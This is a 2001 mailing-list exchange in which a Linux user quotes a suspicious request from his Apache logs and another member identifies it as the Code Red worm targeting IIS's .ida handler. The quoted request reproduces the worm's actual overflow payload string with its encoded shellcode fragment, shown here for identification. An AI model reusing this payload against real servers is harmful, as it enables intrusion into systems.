[ILUG-BOM] Web server buffer overflows
Dr. Sharukh K. R. Pavri.
spavri@[EMAIL-PROTECTED]
Fri Jul 20 16:17:03 IST 2001
Philip S Tellis [Thu, Jul 19, 2001 at 06:47:04PM +0530]:
> Somebody's trying to request this: (adjusted to fit the page)
>
> GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9
> 090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00
> 78%u0000%u00=a
>
> from my web server (Apache 1.3.17)
>
> Does it look like a standard buffer overflow exploit? Doesn't seem to
> have caused any harm yet, but this has been tried over and over again.
Its the Code Red ida worm. affects IIS and is supposed to DoS
www.whitehouse.gov after the 20th of the month. Check the link from /.
Sharukh.
More information about the Linuxers
mailing list